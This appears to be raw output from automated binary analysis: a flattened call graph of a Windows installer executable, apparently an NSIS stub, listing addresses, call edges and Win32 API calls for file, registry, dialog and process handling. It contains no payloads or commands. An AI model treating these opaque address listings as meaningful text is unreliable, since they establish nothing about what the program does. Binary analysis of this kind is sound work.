4041df SetBkMode 3106->3108 3107->3108 3109 4041f7 GetSysColor 3108->3109 3110 4041fd 3108->3110 3109->3110 3111 404204 SetBkColor 3110->3111 3112 40420e 3110->3112 3111->3112 3112->3113 3114 404221 DeleteObject 3112->3114 3115 404228 CreateBrushIndirect 3112->3115 3113->3073 3114->3115 3115->3113 3123 404179 3116->3123 3118 404179 SendMessageW 3119 4052c1 OleUninitialize 3118->3119 3120 405288 3122 4052af 3120->3122 3126 401389 3120->3126 3122->3118 3124 404191 3123->3124 3125 404182 SendMessageW 3123->3125 3124->3120 3125->3124 3127 401390 3126->3127 3128 4013fe 3127->3128 3129 4013cb MulDiv SendMessageW 3127->3129 3128->3120 3129->3127 3922 402251 3923 40225f 3922->3923 3924 402259 3922->3924 3926 40226d 3923->3926 3927 402b38 18 API calls 3923->3927 3925 402b38 18 API calls 3924->3925 3925->3923 3928 402b38 18 API calls 3926->3928 3930 40227b 3926->3930 3927->3926 3928->3930 3929 402b38 18 API calls 3931 402284 WritePrivateProfileStringW 3929->3931 3930->3929 3130 401752 3131 402b38 18 API calls 3130->3131 3132 401759 3131->3132 3133 401781 3132->3133 3134 401779 3132->3134 3188 405ee8 lstrcpynW 3133->3188 3187 405ee8 lstrcpynW 3134->3187 3137 40177f 3141 40617c 5 API calls 3137->3141 3138 40178c 3189 405933 lstrlenW CharPrevW 3138->3189 3166 40179e 3141->3166 3145 4017b0 CompareFileTime 3145->3166 3146 401870 3148 405192 25 API calls 3146->3148 3147 401847 3149 405192 25 API calls 3147->3149 3158 40185c 3147->3158 3151 40187a 3148->3151 3149->3158 3150 405ee8 lstrcpynW 3150->3166 3172 403060 3151->3172 3154 4018a1 SetFileTime 3155 4018b3 FindCloseChangeNotification 3154->3155 3157 4018c4 3155->3157 3155->3158 3156 405f0a 18 API calls 3156->3166 3159 4018c9 3157->3159 3160 4018dc 3157->3160 3161 405f0a 18 API calls 3159->3161 3162 405f0a 18 API calls 3160->3162 3164 4018d1 lstrcatW 3161->3164 3165 4018e4 3162->3165 3164->3165 3167 4056c4 MessageBoxIndirectW 3165->3167 3166->3145 3166->3146 3166->3147 3166->3150 3166->3156 3168 405b2f GetFileAttributesW 3166->3168 3171 405b54 GetFileAttributesW CreateFileW 3166->3171 3192 40622b FindFirstFileW 3166->3192 3195 4056c4 3166->3195 3167->3158 3169 405b41 SetFileAttributesW 3168->3169 3170 405b4e 3168->3170 3169->3170 3170->3166 3171->3166 3173 403070 SetFilePointer 3172->3173 3174 40308c 3172->3174 3173->3174 3199 40317b GetTickCount 3174->3199 3179 40317b 43 API calls 3180 4030c3 3179->3180 3181 40313d ReadFile 3180->3181 3183 40188d 3180->3183 3186 4030d3 3180->3186 3181->3183 3183->3154 3183->3155 3184 405bd7 ReadFile 3184->3186 3185 403106 WriteFile 3185->3183 3185->3186 3186->3183 3186->3184 3186->3185 3187->3137 3188->3138 3190 401792 lstrcatW 3189->3190 3191 40594f lstrcatW 3189->3191 3190->3137 3191->3190 3193 406241 FindClose 3192->3193 3194 40624c 3192->3194 3193->3194 3194->3166 3196 4056d9 3195->3196 3197 405725 3196->3197 3198 4056ed MessageBoxIndirectW 3196->3198 3197->3166 3198->3197 3200 4032e5 3199->3200 3201 4031aa 3199->3201 3202 402d18 33 API calls 3200->3202 3214 40330d SetFilePointer 3201->3214 3208 403093 3202->3208 3204 4031b5 SetFilePointer 3209 4031da 3204->3209 3208->3183 3212 405bd7 ReadFile 3208->3212 3209->3208 3210 40326f WriteFile 3209->3210 3211 4032c6 SetFilePointer 3209->3211 3215 4032f7 3209->3215 3218 40638e 3209->3218 3225 402d18 3209->3225 3210->3208 3210->3209 3211->3200 3213 4030ac 3212->3213 3213->3179 3213->3183 3214->3204 3216 405bd7 ReadFile 3215->3216 3217 40330a 3216->3217 3217->3209 3219 4063b3 3218->3219 3220 4063bb 3218->3220 3219->3209 3220->3219 3221 406442 GlobalFree 3220->3221 3222 40644b GlobalAlloc 3220->3222 3223 4064c2 GlobalAlloc 3220->3223 3224 4064b9 GlobalFree 3220->3224 3221->3222 3222->3219 3222->3220 3223->3219 3223->3220 3224->3223 3226 402d41 3225->3226 3227 402d29 3225->3227 3230 402d51 GetTickCount 3226->3230 3231 402d49 3226->3231 3228 402d32 DestroyWindow 3227->3228 3229 402d39 3227->3229 3228->3229 3229->3209 3230->3229 3233 402d5f 3230->3233 3232 40628b 2 API calls 3231->3232 3232->3229 3234 402d94 CreateDialogParamW ShowWindow 3233->3234 3235 402d67 3233->3235 3234->3229 3235->3229 3240 402cfc 3235->3240 3237 402d75 wsprintfW 3238 405192 25 API calls 3237->3238 3239 402d92 3238->3239 3239->3229 3241 402d0b 3240->3241 3242 402d0d MulDiv 3240->3242 3241->3242 3242->3237 3932 402452 3933 402c42 19 API calls 3932->3933 3934 40245c 3933->3934 3935 402b1b 18 API calls 3934->3935 3936 402465 3935->3936 3937 402489 RegEnumValueW 3936->3937 3938 40247d RegEnumKeyW 3936->3938 3940 402791 3936->3940 3939 4024a2 RegCloseKey 3937->3939 3937->3940 3938->3939 3939->3940 3243 4022d3 3244 402303 3243->3244 3245 4022d8 3243->3245 3246 402b38 18 API calls 3244->3246 3266 402c42 3245->3266 3249 40230a 3246->3249 3248 4022df 3250 4022e9 3248->3250 3254 402320 3248->3254 3255 402b78 RegOpenKeyExW 3249->3255 3251 402b38 18 API calls 3250->3251 3252 4022f0 RegDeleteValueW RegCloseKey 3251->3252 3252->3254 3256 402c0c 3255->3256 3258 402ba3 3255->3258 3256->3254 3257 402bc9 RegEnumKeyW 3257->3258 3259 402bdb RegCloseKey 3257->3259 3258->3257 3258->3259 3261 402c00 RegCloseKey 3258->3261 3264 402b78 3 API calls 3258->3264 3270 406252 GetModuleHandleA 3259->3270 3263 402bef 3261->3263 3263->3256 3264->3258 3265 402c1b RegDeleteKeyW 3265->3263 3267 402b38 18 API calls 3266->3267 3268 402c5b 3267->3268 3269 402c69 RegOpenKeyExW 3268->3269 3269->3248 3271 406279 GetProcAddress 3270->3271 3272 40626e LoadLibraryA 3270->3272 3273 402beb 3271->3273 3272->3271 3272->3273 3273->3263 3273->3265 3942 401ed4 3943 402b38 18 API calls 3942->3943 3944 401edb 3943->3944 3945 40622b 2 API calls 3944->3945 3946 401ee1 3945->3946 3948 401ef2 3946->3948 3949 405e2f wsprintfW 3946->3949 3949->3948 3391 403c55 3392 403da8 3391->3392 3393 403c6d 3391->3393 3395 403df9 3392->3395 3396 403db9 GetDlgItem GetDlgItem 3392->3396 3393->3392 3394 403c79 3393->3394 3397 403c84 SetWindowPos 3394->3397 3398 403c97 3394->3398 3400 403e53 3395->3400 3409 401389 2 API calls 3395->3409 3399 40412d 19 API calls 3396->3399 3397->3398 3402 403cb4 3398->3402 3403 403c9c ShowWindow 3398->3403 3404 403de3 SetClassLongW 3399->3404 3401 404179 SendMessageW 3400->3401 3405 403da3 3400->3405 3432 403e65 3401->3432 3406 403cd6 3402->3406 3407 403cbc DestroyWindow 3402->3407 3403->3402 3408 40140b 2 API calls 3404->3408 3411 403cdb SetWindowLongW 3406->3411 3412 403cec 3406->3412 3410 4040b6 3407->3410 3408->3395 3413 403e2b 3409->3413 3410->3405 3420 4040e7 ShowWindow 3410->3420 3411->3405 3417 403d95 3412->3417 3418 403cf8 GetDlgItem 3412->3418 3413->3400 3414 403e2f SendMessageW 3413->3414 3414->3405 3415 40140b 2 API calls 3415->3432 3416 4040b8 DestroyWindow EndDialog 3416->3410 3419 404194 8 API calls 3417->3419 3421 403d28 3418->3421 3422 403d0b SendMessageW IsWindowEnabled 3418->3422 3419->3405 3420->3405 3424 403d35 3421->3424 3425 403d7c SendMessageW 3421->3425 3426 403d48 3421->3426 3435 403d2d 3421->3435 3422->3405 3422->3421 3423 405f0a 18 API calls 3423->3432 3424->3425 3424->3435 3425->3417 3429 403d50 3426->3429 3430 403d65 3426->3430 3427 404106 SendMessageW 3431 403d63 3427->3431 3428 40412d 19 API calls 3428->3432 3464 40140b 3429->3464 3434 40140b 2 API calls 3430->3434 3431->3417 3432->3405 3432->3415 3432->3416 3432->3423 3432->3428 3437 40412d 19 API calls 3432->3437 3452 403ff8 DestroyWindow 3432->3452 3436 403d6c 3434->3436 3435->3427 3436->3417 3436->3435 3438 403ee0 GetDlgItem 3437->3438 3439 403ef5 3438->3439 3440 403efd ShowWindow KiUserCallbackDispatcher 3438->3440 3439->3440 3461 40414f KiUserCallbackDispatcher 3440->3461 3442 403f27 EnableWindow 3445 403f3b 3442->3445 3443 403f40 GetSystemMenu EnableMenuItem SendMessageW 3444 403f70 SendMessageW 3443->3444 3443->3445 3444->3445 3445->3443 3462 404162 SendMessageW 3445->3462 3463 405ee8 lstrcpynW 3445->3463 3448 403f9e lstrlenW 3449 405f0a 18 API calls 3448->3449 3450 403fb4 SetWindowTextW 3449->3450 3451 401389 2 API calls 3450->3451 3451->3432 3452->3410 3453 404012 CreateDialogParamW 3452->3453 3453->3410 3454 404045 3453->3454 3455 40412d 19 API calls 3454->3455 3456 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3455->3456 3457 401389 2 API calls 3456->3457 3458 404096 3457->3458 3458->3405 3459 40409e ShowWindow 3458->3459 3460 404179 SendMessageW 3459->3460 3460->3410 3461->3442 3462->3445 3463->3448 3465 401389 2 API calls 3464->3465 3466 401420 3465->3466 3466->3435 3950 4014d7 3951 402b1b 18 API calls 3950->3951 3952 4014dd Sleep 3951->3952 3954 4029c5 3952->3954 3478 403358 #17 SetErrorMode OleInitialize 3479 406252 3 API calls 3478->3479 3480 40339b SHGetFileInfoW 3479->3480 3551 405ee8 lstrcpynW 3480->3551 3482 4033c6 GetCommandLineW 3552 405ee8 lstrcpynW 3482->3552 3484 4033d8 GetModuleHandleW 3485 4033f0 3484->3485 3486 405960 CharNextW 3485->3486 3487 4033ff CharNextW 3486->3487 3489 40340f 3487->3489 3488 4034e4 3490 4034f8 GetTempPathW 3488->3490 3489->3488 3489->3489 3493 405960 CharNextW 3489->3493 3501 4034e6 3489->3501 3553 403324 3490->3553 3492 403510 3494 403514 GetWindowsDirectoryW lstrcatW 3492->3494 3495 40356a DeleteFileW 3492->3495 3493->3489 3496 403324 11 API calls 3494->3496 3561 402dba GetTickCount GetModuleFileNameW 3495->3561 3498 403530 3496->3498 3498->3495 3500 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3498->3500 3499 40357e 3502 403616 3499->3502 3504 403606 3499->3504 3508 405960 CharNextW 3499->3508 3503 403324 11 API calls 3500->3503 3645 405ee8 lstrcpynW 3501->3645 3648 4037c0 3502->3648 3507 403562 3503->3507 3591 4038b2 3504->3591 3507->3495 3507->3502 3511 403599 3508->3511 3517 4035e0 3511->3517 3518 403645 lstrcatW lstrcmpiW 3511->3518 3512 403725 3515 4037a8 ExitProcess 3512->3515 3519 406252 3 API calls 3512->3519 3513 40362f 3514 4056c4 MessageBoxIndirectW 3513->3514 3516 40363d ExitProcess 3514->3516 3521 405a3b 18 API calls 3517->3521 3518->3502 3522 403661 CreateDirectoryW SetCurrentDirectoryW 3518->3522 3523 403734 3519->3523 3524 4035ec 3521->3524 3525 403684 3522->3525 3526 403679 3522->3526 3527 406252 3 API calls 3523->3527 3524->3502 3646 405ee8 lstrcpynW 3524->3646 3658 405ee8 lstrcpynW 3525->3658 3657 405ee8 lstrcpynW 3526->3657 3530 40373d 3527->3530 3532 406252 3 API calls 3530->3532 3533 403746 3532->3533 3535 403794 ExitWindowsEx 3533->3535 3540 403754 GetCurrentProcess 3533->3540 3534 4035fb 3647 405ee8 lstrcpynW 3534->3647 3535->3515 3538 4037a1 3535->3538 3537 405f0a 18 API calls 3539 4036c3 DeleteFileW 3537->3539 3541 40140b 2 API calls 3538->3541 3542 4036d0 CopyFileW 3539->3542 3548 403692 3539->3548 3544 403764 3540->3544 3541->3515 3542->3548 3543 403719 3545 405d82 40 API calls 3543->3545 3544->3535 3545->3502 3546 405d82 40 API calls 3546->3548 3547 405f0a 18 API calls 3547->3548 3548->3537 3548->3543 3548->3546 3548->3547 3549 405663 2 API calls 3548->3549 3550 403704 CloseHandle 3548->3550 3549->3548 3550->3548 3551->3482 3552->3484 3554 40617c 5 API calls 3553->3554 3555 403330 3554->3555 3556 40333a 3555->3556 3557 405933 3 API calls 3555->3557 3556->3492 3558 403342 CreateDirectoryW 3557->3558 3659 405b83 3558->3659 3663 405b54 GetFileAttributesW CreateFileW 3561->3663 3563 402dfd 3590 402e0a 3563->3590 3664 405ee8 lstrcpynW 3563->3664 3565 402e20 3566 40597f 2 API calls 3565->3566 3567 402e26 3566->3567 3665 405ee8 lstrcpynW 3567->3665 3569 402e31 GetFileSize 3570 402f32 3569->3570 3572 402e48 3569->3572 3571 402d18 33 API calls 3570->3571 3574 402f39 3571->3574 3572->3570 3573 4032f7 ReadFile 3572->3573 3575 402fcd 3572->3575 3581 402d18 33 API calls 3572->3581 3572->3590 3573->3572 3576 402f75 GlobalAlloc 3574->3576 3574->3590 3667 40330d SetFilePointer 3574->3667 3578 402d18 33 API calls 3575->3578 3577 402f8c 3576->3577 3582 405b83 2 API calls 3577->3582 3578->3590 3580 402f56 3583 4032f7 ReadFile 3580->3583 3581->3572 3585 402f9d CreateFileW 3582->3585 3584 402f61 3583->3584 3584->3576 3584->3590 3586 402fd7 3585->3586 3585->3590 3666 40330d SetFilePointer 3586->3666 3588 402fe5 3589 403060 46 API calls 3588->3589 3589->3590 3590->3499 3590->3590 3592 406252 3 API calls 3591->3592 3593 4038c6 3592->3593 3594 4038cc 3593->3594 3595 4038de 3593->3595 3677 405e2f wsprintfW 3594->3677 3596 405db5 3 API calls 3595->3596 3597 40390e 3596->3597 3599 40392d lstrcatW 3597->3599 3601 405db5 3 API calls 3597->3601 3600 4038dc 3599->3600 3668 403b88 3600->3668 3601->3599 3604 405a3b 18 API calls 3605 40395f 3604->3605 3606 4039f3 3605->3606 3609 405db5 3 API calls 3605->3609 3607 405a3b 18 API calls 3606->3607 3608 4039f9 3607->3608 3611 403a09 LoadImageW 3608->3611 3612 405f0a 18 API calls 3608->3612 3610 403991 3609->3610 3610->3606 3615 4039b2 lstrlenW 3610->3615 3619 405960 CharNextW 3610->3619 3613 403a30 RegisterClassW 3611->3613 3614 403aaf 3611->3614 3612->3611 3616 403a66 SystemParametersInfoW CreateWindowExW 3613->3616 3617 403ab9 3613->3617 3618 40140b 2 API calls 3614->3618 3620 4039c0 lstrcmpiW 3615->3620 3621 4039e6 3615->3621 3616->3614 3617->3502 3622 403ab5 3618->3622 3623 4039af 3619->3623 3620->3621 3624 4039d0 GetFileAttributesW 3620->3624 3625 405933 3 API calls 3621->3625 3622->3617 3627 403b88 19 API calls 3622->3627 3623->3615 3626 4039dc 3624->3626 3628 4039ec 3625->3628 3626->3621 3629 40597f 2 API calls 3626->3629 3630 403ac6 3627->3630 3678 405ee8 lstrcpynW 3628->3678 3629->3621 3632 403ad2 ShowWindow LoadLibraryW 3630->3632 3633 403b55 3630->3633 3635 403af1 LoadLibraryW 3632->3635 3636 403af8 GetClassInfoW 3632->3636 3634 405265 5 API calls 3633->3634 3639 403b5b 3634->3639 3635->3636 3637 403b22 DialogBoxParamW 3636->3637 3638 403b0c GetClassInfoW RegisterClassW 3636->3638 3640 40140b 2 API calls 3637->3640 3638->3637 3641 403b77 3639->3641 3642 403b5f 3639->3642 3640->3617 3643 40140b 2 API calls 3641->3643 3642->3617 3644 40140b 2 API calls 3642->3644 3643->3617 3644->3617 3645->3490 3646->3534 3647->3504 3649 4037d1 CloseHandle 3648->3649 3650 4037db 3648->3650 3649->3650 3651 4037e5 CloseHandle 3650->3651 3652 4037ef 3650->3652 3651->3652 3680 40381d 3652->3680 3655 405770 71 API calls 3656 40361f OleUninitialize 3655->3656 3656->3512 3656->3513 3657->3525 3658->3548 3660 405b90 GetTickCount GetTempFileNameW 3659->3660 3661 405bc6 3660->3661 3662 403356 3660->3662 3661->3660 3661->3662 3662->3492 3663->3563 3664->3565 3665->3569 3666->3588 3667->3580 3669 403b9c 3668->3669 3679 405e2f wsprintfW 3669->3679 3671 403c0d 3672 405f0a 18 API calls 3671->3672 3673 403c19 SetWindowTextW 3672->3673 3674 40393d 3673->3674 3675 403c35 3673->3675 3674->3604 3675->3674 3676 405f0a 18 API calls 3675->3676 3676->3675 3677->3600 3678->3606 3679->3671 3681 40382b 3680->3681 3682 403830 FreeLibrary GlobalFree 3681->3682 3683 4037f4 3681->3683 3682->3682 3682->3683 3683->3655 3955 40155b 3956 40296b 3955->3956 3959 405e2f wsprintfW 3956->3959 3958 402970 3959->3958 3967 4023de 3968 402c42 19 API calls 3967->3968 3969 4023e8 3968->3969 3970 402b38 18 API calls 3969->3970 3971 4023f1 3970->3971 3972 4023fc RegQueryValueExW 3971->3972 3976 402791 3971->3976 3973 402422 RegCloseKey 3972->3973 3974 40241c 3972->3974 3973->3976 3974->3973 3978 405e2f wsprintfW 3974->3978 3978->3973 3979 401ce5 GetDlgItem GetClientRect 3980 402b38 18 API calls 3979->3980 3981 401d17 LoadImageW SendMessageW 3980->3981 3982 401d35 DeleteObject 3981->3982 3983 4029c5 3981->3983 3982->3983 3984 40206a 3985 402b38 18 API calls 3984->3985 3986 402071 3985->3986 3987 402b38 18 API calls 3986->3987 3988 40207b 3987->3988 3989 402b38 18 API calls 3988->3989 3990 402084 3989->3990 3991 402b38 18 API calls 3990->3991 3992 40208e 3991->3992 3993 402b38 18 API calls 3992->3993 3994 402098 3993->3994 3995 4020ac CoCreateInstance 3994->3995 3996 402b38 18 API calls 3994->3996 3999 4020cb 3995->3999 3996->3995 3997 401423 25 API calls 3998 402195 3997->3998 3999->3997 3999->3998 4000 40156b 4001 401584 4000->4001 4002 40157b ShowWindow 4000->4002 4003 401592 ShowWindow 4001->4003 4004 4029c5 4001->4004 4002->4001 4003->4004 4005 4024ec 4006 4024f1 4005->4006 4007 40250a 4005->4007 4008 402b1b 18 API calls 4006->4008 4009 402510 4007->4009 4010 40253c 4007->4010 4013 4024f8 4008->4013 4011 402b38 18 API calls 4009->4011 4012 402b38 18 API calls 4010->4012 4014 402517 WideCharToMultiByte lstrlenA 4011->4014 4015 402543 lstrlenW 4012->4015 4016 402791 4013->4016 4017 402565 WriteFile 4013->4017 4014->4013 4015->4013 4017->4016 4018 40276e 4019 402b38 18 API calls 4018->4019 4020 402775 FindFirstFileW 4019->4020 4021 40279d 4020->4021 4025 402788 4020->4025 4023 4027a6 4021->4023 4026 405e2f wsprintfW 4021->4026 4027 405ee8 lstrcpynW 4023->4027 4026->4023 4027->4025 4028 4018ef 4029 401926 4028->4029 4030 402b38 18 API calls 4029->4030 4031 40192b 4030->4031 4032 405770 71 API calls 4031->4032 4033 401934 4032->4033 4034 403870 4035 40387b 4034->4035 4036 403882 GlobalAlloc 4035->4036 4037 40387f 4035->4037 4036->4037 4038 402571 4039 402b1b 18 API calls 4038->4039 4043 402580 4039->4043 4040 40269e 4041 4025c6 ReadFile 4041->4040 4041->4043 4042 405bd7 ReadFile 4042->4043 4043->4040 4043->4041 4043->4042 4044 4026a0 4043->4044 4045 402606 MultiByteToWideChar 4043->4045 4047 40262c SetFilePointer MultiByteToWideChar 4043->4047 4048 4026b1 4043->4048 4050 405e2f wsprintfW 4044->4050 4045->4043 4047->4043 4048->4040 4049 4026d2 SetFilePointer 4048->4049 4049->4040 4050->4040 4051 4014f1 SetForegroundWindow 4052 4029c5 4051->4052 4060 4018f2 4061 402b38 18 API calls 4060->4061 4062 4018f9 4061->4062 4063 4056c4 MessageBoxIndirectW 4062->4063 4064 401902 4063->4064 4072 401df3 4073 402b38 18 API calls 4072->4073 4074 401df9 4073->4074 4075 402b38 18 API calls 4074->4075 4076 401e02 4075->4076 4077 402b38 18 API calls 4076->4077 4078 401e0b 4077->4078 4079 402b38 18 API calls 4078->4079 4080 401e14 4079->4080 4081 401423 25 API calls 4080->4081 4082 401e1b ShellExecuteW 4081->4082 4083 401e4c 4082->4083 4089 4026f7 4090 4026fe 4089->4090 4092 402970 4089->4092 4091 402b1b 18 API calls 4090->4091 4093 402709 4091->4093 4094 402710 SetFilePointer 4093->4094 4094->4092 4095 402720 4094->4095 4097 405e2f wsprintfW 4095->4097 4097->4092 4105 40427b lstrlenW 4106 40429a 4105->4106 4107 40429c WideCharToMultiByte 4105->4107 4106->4107 4108 402c7d 4109 402ca8 4108->4109 4110 402c8f SetTimer 4108->4110 4111 402cf6 4109->4111 4112 402cfc MulDiv 4109->4112 4110->4109 4113 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4112->4113 4113->4111 4115 4014ff 4116 401507 4115->4116 4118 40151a 4115->4118 4117 402b1b 18 API calls 4116->4117 4117->4118 4119 401000 4120 401037 BeginPaint GetClientRect 4119->4120 4121 40100c DefWindowProcW 4119->4121 4123 4010f3 4120->4123 4124 401179 4121->4124 4125 401073 CreateBrushIndirect FillRect DeleteObject 4123->4125 4126 4010fc 4123->4126 4125->4123 4127 401102 CreateFontIndirectW 4126->4127 4128 401167 EndPaint 4126->4128 4127->4128 4129 401112 6 API calls 4127->4129 4128->4124 4129->4128 4130 401a00 4131 402b38 18 API calls 4130->4131 4132 401a09 ExpandEnvironmentStringsW 4131->4132 4133 401a1d 4132->4133 4135 401a30 4132->4135 4134 401a22 lstrcmpW 4133->4134 4133->4135 4134->4135 4136 401b01 4137 402b38 18 API calls 4136->4137 4138 401b08 4137->4138 4139 402b1b 18 API calls 4138->4139 4140 401b11 wsprintfW 4139->4140 4141 4029c5 4140->4141 4142 404581 4143 404591 4142->4143 4144 4045b7 4142->4144 4145 40412d 19 API calls 4143->4145 4146 404194 8 API calls 4144->4146 4147 40459e SetDlgItemTextW 4145->4147 4148 4045c3 4146->4148 4147->4144 4149 405106 4150 405116 4149->4150 4151 40512a 4149->4151 4152 405173 4150->4152 4153 40511c 4150->4153 4154 405132 IsWindowVisible 4151->4154 4160 405149 4151->4160 4155 405178 CallWindowProcW 4152->4155 4156 404179 SendMessageW 4153->4156 4154->4152 4157 40513f 4154->4157 4158 405126 4155->4158 4156->4158 4162 404a5c SendMessageW 4157->4162 4160->4155 4167 404adc 4160->4167 4163 404abb SendMessageW 4162->4163 4164 404a7f GetMessagePos ScreenToClient SendMessageW 4162->4164 4165 404ab3 4163->4165 4164->4165 4166 404ab8 4164->4166 4165->4160 4166->4163 4176 405ee8 lstrcpynW 4167->4176 4169 404aef 4177 405e2f wsprintfW 4169->4177 4171 404af9 4172 40140b 2 API calls 4171->4172 4173 404b02 4172->4173 4178 405ee8 lstrcpynW 4173->4178 4175 404b09 4175->4152 4176->4169 4177->4171 4178->4175 4179 401f08 4180 402b38 18 API calls 4179->4180 4181 401f0f GetFileVersionInfoSizeW 4180->4181 4182 401f8c 4181->4182 4183 401f36 GlobalAlloc 4181->4183 4183->4182 4184 401f4a GetFileVersionInfoW 4183->4184 4184->4182 4185 401f59 VerQueryValueW 4184->4185 4185->4182 4186 401f72 4185->4186 4190 405e2f wsprintfW 4186->4190 4188 401f7e 4191 405e2f wsprintfW 4188->4191 4190->4188 4191->4182 4199 404b0e GetDlgItem GetDlgItem 4200 404b60 7 API calls 4199->4200 4207 404d79 4199->4207 4201 404c03 DeleteObject 4200->4201 4202 404bf6 SendMessageW 4200->4202 4203 404c0c 4201->4203 4202->4201 4204 404c43 4203->4204 4206 405f0a 18 API calls 4203->4206 4208 40412d 19 API calls 4204->4208 4205 404e5d 4209 404f09 4205->4209 4218 404eb6 SendMessageW 4205->4218 4242 404d6c 4205->4242 4210 404c25 SendMessageW SendMessageW 4206->4210 4207->4205 4216 404a5c 5 API calls 4207->4216 4228 404dea 4207->4228 4213 404c57 4208->4213 4211 404f13 SendMessageW 4209->4211 4212 404f1b 4209->4212 4210->4203 4211->4212 4220 404f34 4212->4220 4221 404f2d ImageList_Destroy 4212->4221 4229 404f44 4212->4229 4217 40412d 19 API calls 4213->4217 4214 404194 8 API calls 4219 4050ff 4214->4219 4215 404e4f SendMessageW 4215->4205 4216->4228 4233 404c65 4217->4233 4223 404ecb SendMessageW 4218->4223 4218->4242 4224 404f3d GlobalFree 4220->4224 4220->4229 4221->4220 4222 4050b3 4230 4050c5 ShowWindow GetDlgItem ShowWindow 4222->4230 4222->4242 4226 404ede 4223->4226 4224->4229 4225 404d3a GetWindowLongW SetWindowLongW 4227 404d53 4225->4227 4234 404eef SendMessageW 4226->4234 4231 404d71 4227->4231 4232 404d59 ShowWindow 4227->4232 4228->4205 4228->4215 4229->4222 4241 404adc 4 API calls 4229->4241 4244 404f7f 4229->4244 4230->4242 4251 404162 SendMessageW 4231->4251 4250 404162 SendMessageW 4232->4250 4233->4225 4235 404d34 4233->4235 4238 404cb5 SendMessageW 4233->4238 4239 404cf1 SendMessageW 4233->4239 4240 404d02 SendMessageW 4233->4240 4234->4209 4235->4225 4235->4227 4238->4233 4239->4233 4240->4233 4241->4244 4242->4214 4243 405089 InvalidateRect 4243->4222 4245 40509f 4243->4245 4246 404fad SendMessageW 4244->4246 4247 404fc3 4244->4247 4248 404976 21 API calls 4245->4248 4246->4247 4247->4243 4249 405037 SendMessageW SendMessageW 4247->4249 4248->4222 4249->4247 4250->4242 4251->4207 4252 404910 4253 404920 4252->4253 4254 40493c 4252->4254 4263 4056a8 GetDlgItemTextW 4253->4263 4256 404942 SHGetPathFromIDListW 4254->4256 4257 40496f 4254->4257 4259 404959 SendMessageW 4256->4259 4260 404952 4256->4260 4258 40492d SendMessageW 4258->4254 4259->4257 4262 40140b 2 API calls 4260->4262 4262->4259 4263->4258 4264 401491 4265 405192 25 API calls 4264->4265 4266 401498 4265->4266 4267 402293 4268 402b38 18 API calls 4267->4268 4269 4022a2 4268->4269 4270 402b38 18 API calls 4269->4270 4271 4022ab 4270->4271 4272 402b38 18 API calls 4271->4272 4273 4022b5 GetPrivateProfileStringW 4272->4273 4274 401718 4275 402b38 18 API calls 4274->4275 4276 40171f SearchPathW 4275->4276 4277 40173a 4276->4277 4278 401f98 4279 401faa 4278->4279 4289 40205c 4278->4289 4280 402b38 18 API calls 4279->4280 4282 401fb1 4280->4282 4281 401423 25 API calls 4287 402195 4281->4287 4283 402b38 18 API calls 4282->4283 4284 401fba 4283->4284 4285 401fd0 LoadLibraryExW 4284->4285 4286 401fc2 GetModuleHandleW 4284->4286 4288 401fe1 4285->4288 4285->4289 4286->4285 4286->4288 4298 4062be WideCharToMultiByte 4288->4298 4289->4281 4292 401ff2 4295 401423 25 API calls 4292->4295 4296 402002 4292->4296 4293 40202b 4294 405192 25 API calls 4293->4294 4294->4296 4295->4296 4296->4287 4297 40204e FreeLibrary 4296->4297 4297->4287 4299 4062e8 GetProcAddress 4298->4299 4300 401fec 4298->4300 4299->4300 4300->4292 4300->4293 3706 40159b 3707 402b38 18 API calls 3706->3707 3708 4015a2 SetFileAttributesW 3707->3708 3709 4015b4 3708->3709 4301 40149e 4302 40223c 4301->4302 4303 4014ac PostQuitMessage 4301->4303 4303->4302 4304 40219e 4305 402b38 18 API calls 4304->4305 4306 4021a4 4305->4306 4307 402b38 18 API calls 4306->4307 4308 4021ad 4307->4308 4309 402b38 18 API calls 4308->4309 4310 4021b6 4309->4310 4311 40622b 2 API calls 4310->4311 4312 4021bf 4311->4312 4313 4021d0 lstrlenW lstrlenW 4312->4313 4314 4021c3 4312->4314 4316 405192 25 API calls 4313->4316 4315 405192 25 API calls 4314->4315 4317 4021cb 4314->4317 4315->4317 4318 40220e SHFileOperationW 4316->4318 4318->4314 4318->4317 4319 4029a0 SendMessageW 4320 4029c5 4319->4320 4321 4029ba InvalidateRect 4319->4321 4321->4320 4329 401b22 4330 401b73 4329->4330 4331 401b2f 4329->4331 4333 401b78 4330->4333 4334 401b9d GlobalAlloc 4330->4334 4332 402229 4331->4332 4338 401b46 4331->4338 4335 405f0a 18 API calls 4332->4335 4343 401bb8 4333->4343 4350 405ee8 lstrcpynW 4333->4350 4336 405f0a 18 API calls 4334->4336 4337 402236 4335->4337 4336->4343 4344 4056c4 MessageBoxIndirectW 4337->4344 4348 405ee8 lstrcpynW 4338->4348 4341 401b8a GlobalFree 4341->4343 4342 401b55 4349 405ee8 lstrcpynW 4342->4349 4344->4343 4346 401b64 4351 405ee8 lstrcpynW 4346->4351 4348->4342 4349->4346 4350->4341 4351->4343 4352 402222 4353 402229 4352->4353 4356 40223c 4352->4356 4354 405f0a 18 API calls 4353->4354 4355 402236 4354->4355 4357 4056c4 MessageBoxIndirectW 4355->4357 4357->4356 3274 401924 3275 401926 3274->3275 3276 402b38 18 API calls 3275->3276 3277 40192b 3276->3277 3280 405770 3277->3280 3319 405a3b 3280->3319 3283 405798 DeleteFileW 3290 401934 3283->3290 3285 4057af 3286 4058cf 3285->3286 3333 405ee8 lstrcpynW 3285->3333 3286->3290 3293 40622b 2 API calls 3286->3293 3287 4057d5 3288 4057e8 3287->3288 3289 4057db lstrcatW 3287->3289 3334 40597f lstrlenW 3288->3334 3291 4057ee 3289->3291 3294 4057fe lstrcatW 3291->3294 3296 405809 lstrlenW FindFirstFileW 3291->3296 3295 4058f4 3293->3295 3294->3296 3295->3290 3297 4058f8 3295->3297 3296->3286 3305 40582b 3296->3305 3298 405933 3 API calls 3297->3298 3299 4058fe 3298->3299 3301 405728 5 API calls 3299->3301 3300 4058b2 FindNextFileW 3303 4058c8 FindClose 3300->3303 3300->3305 3304 40590a 3301->3304 3303->3286 3306 405924 3304->3306 3307 40590e 3304->3307 3305->3300 3314 405873 3305->3314 3338 405ee8 lstrcpynW 3305->3338 3309 405192 25 API calls 3306->3309 3307->3290 3310 405192 25 API calls 3307->3310 3309->3290 3312 40591b 3310->3312 3311 405770 64 API calls 3311->3314 3313 405d82 40 API calls 3312->3313 